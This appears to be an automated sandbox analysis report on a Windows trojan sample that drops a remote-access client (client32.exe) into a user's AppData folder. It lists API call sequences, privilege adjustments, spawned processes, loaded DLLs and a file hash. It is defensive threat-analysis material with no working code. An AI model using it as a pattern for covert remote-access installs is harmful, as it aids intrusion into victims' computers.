3_2_1115EA00

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102DD21
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	11_2_1102D900

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004173EF	0_2_004173EF
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040C10C	0_2_0040C10C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040C35C	0_2_0040C35C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041037B	0_2_0041037B
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041A339	0_2_0041A339
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004163B4	0_2_004163B4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040C615	0_2_0040C615
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041A70D	0_2_0041A70D
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041E794	0_2_0041E794
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004048A0	0_2_004048A0
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041AB19	0_2_0041AB19
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00402E66	0_2_00402E66
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0044EEE7	0_2_0044EEE7
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041AF39	0_2_0041AF39
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00413205	0_2_00413205
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041552A	0_2_0041552A
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00405538	0_2_00405538
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00413664	0_2_00413664
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00413BA7	0_2_00413BA7
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00401C56	0_2_00401C56
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00413CC3	0_2_00413CC3
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0040FDFF	0_2_0040FDFF
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00419E64	0_2_00419E64
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00413FDA	0_2_00413FDA
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022B2006	0_2_022B2006
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A41AC	0_2_022A41AC
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022B068C	0_2_022B068C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A4409	0_2_022A4409
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022B056C	0_2_022B056C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AD2D0	0_2_022AD2D0
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022AD768	0_2_022AD768
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0229749C	0_2_0229749C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0229798C	0_2_0229798C
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A3F7A	0_2_022A3F7A
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_022A3D48	0_2_022A3D48
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11073680	3_2_11073680
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11029BB0	3_2_11029BB0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110627B0	3_2_110627B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_110336D0	3_2_110336D0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11051800	3_2_11051800
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1115F840	3_2_1115F840
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1102BD40	3_2_1102BD40
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1101BCD0	3_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11087F50	3_2_11087F50
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11045E70	3_2_11045E70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1101C110	3_2_1101C110
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111640E0	3_2_111640E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11168345	3_2_11168345
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_111265B0	3_2_111265B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11070430	3_2_11070430
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11080740	3_2_11080740
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1100892B	3_2_1100892B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1101CF30	3_2_1101CF30
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1116EE8B	3_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF6E28	3_2_6CEF6E28
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF6E24	3_2_6CEF6E24
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF56E18	3_2_6CF56E18
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF70915	3_2_6CF70915
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF10919	3_2_6CF10919
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF2EB1A	3_2_6CF2EB1A
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF8468	3_2_6CEF8468
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF045AE	3_2_6CF045AE
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF5E7F1	3_2_6CF5E7F1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF867FF	3_2_6CF867FF
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEE21F0	3_2_6CEE21F0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEFA1DD	3_2_6CEFA1DD
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF54159	3_2_6CF54159
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF522CD	3_2_6CF522CD
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF828B	3_2_6CEF828B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF3A277	3_2_6CF3A277
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF78220	3_2_6CF78220
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF839B	3_2_6CEF839B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF71CEF	3_2_6CF71CEF
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF9C8E	3_2_6CEF9C8E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF3DB1	3_2_6CEF3DB1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF7D20	3_2_6CEF7D20
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF5E20	3_2_6CEF5E20
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110627B0	11_2_110627B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11073680	11_2_11073680
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_110336D0	11_2_110336D0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11051800	11_2_11051800
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1115F840	11_2_1115F840
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11029BB0	11_2_11029BB0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1102BD40	11_2_1102BD40
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1101BCD0	11_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11087F50	11_2_11087F50
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11045E70	11_2_11045E70
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1101C110	11_2_1101C110
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111640E0	11_2_111640E0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11168345	11_2_11168345
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_111265B0	11_2_111265B0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11070430	11_2_11070430
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11080740	11_2_11080740
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1100892B	11_2_1100892B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1101CF30	11_2_1101CF30
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1116EE8B	11_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF6E28	11_2_6CEF6E28
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF6E24	11_2_6CEF6E24
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF56E18	11_2_6CF56E18
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF70915	11_2_6CF70915
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF10919	11_2_6CF10919
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF2EB1A	11_2_6CF2EB1A
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF8468	11_2_6CEF8468
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF045AE	11_2_6CF045AE
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF5E7F1	11_2_6CF5E7F1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF867FF	11_2_6CF867FF
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEE21F0	11_2_6CEE21F0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEFA1DD	11_2_6CEFA1DD
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF54159	11_2_6CF54159
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF522CD	11_2_6CF522CD
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF828B	11_2_6CEF828B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3A277	11_2_6CF3A277
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF78220	11_2_6CF78220
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF839B	11_2_6CEF839B
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF71CEF	11_2_6CF71CEF
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF9C8E	11_2_6CEF9C8E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF3DB1	11_2_6CEF3DB1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF7D20	11_2_6CEF7D20
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF5E20	11_2_6CEF5E20
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DF35	11_2_6CF3DF35
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF5F8BA	11_2_6CF5F8BA
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF59877	11_2_6CF59877
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF73968	11_2_6CF73968
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF81AE0	11_2_6CF81AE0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF3DA38	11_2_6CF3DA38
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF87B2A	11_2_6CF87B2A
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF3B1D	11_2_6CEF3B1D

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11161299 appears 81 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11027F40 appears 94 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEF0934 appears 96 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11164ED0 appears 64 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEFA455 appears 53 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 110B7EF0 appears 43 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11147060 appears 1207 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 1105E820 appears 588 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEF072B appears 39 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEFD778 appears 40 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 1105E950 appears 54 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEF0950 appears 215 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEFB69A appears 77 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 111744C6 appears 40 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11147AD0 appears 44 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11081E70 appears 89 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 1109DCE0 appears 32 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 6CEFA42E appears 42 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 11029A70 appears 2012 times
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: String function: 1116FED0 appears 74 times
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: String function: 00419784 appears 41 times
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: String function: 00419E00 appears 49 times
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: String function: 0041ED5C appears 37 times
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: String function: 022A1D7B appears 34 times

Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcctl32.dll4 vs hkpqXovZtS.exe
Source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006692000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcicl32.dll4 vs hkpqXovZtS.exe

Source: hkpqXovZtS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/16@7/2

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1105A760 GetLastError,FormatMessageA,LocalFree,

3_2_1105A760

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	3_2_1109D860
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,	3_2_1109D8F0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	11_2_1109D860
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,	11_2_1109D8F0

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_02291C53 GetCurrentThread,GetCurrentThread,GetThreadPriority,GetCurrentThread,SetThreadPriority,GetCurrentProcessId,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,Thread32First,GetCurrentProcessId,GetCurrentThreadId,Thread32Next,GetCurrentThread,CloseHandle,GetCurrentThread,SetThreadPriority,

0_2_02291C53

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

3_2_11116880

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11089430 FindResourceA,LoadResource,LockResource,

3_2_11089430

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

3_2_11128B10

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_6140921

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: sfxcmd	0_2_0040FBD4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: sfxcmd	0_2_0040FBD4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: sfxname	0_2_0040FBD4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: xB	0_2_0040FBD4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: STARTDLG	0_2_0040FBD4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Command line argument: lB	0_2_0040FBD4

Source: hkpqXovZtS.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hkpqXovZtS.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hkpqXovZtS.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File read: C:\Users\user\Desktop\hkpqXovZtS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hkpqXovZtS.exe "C:\Users\user\Desktop\hkpqXovZtS.exe"
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Process created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: mscvrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: mscvrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: mscvrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: mscvrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winmm.dll	Jump to behavior
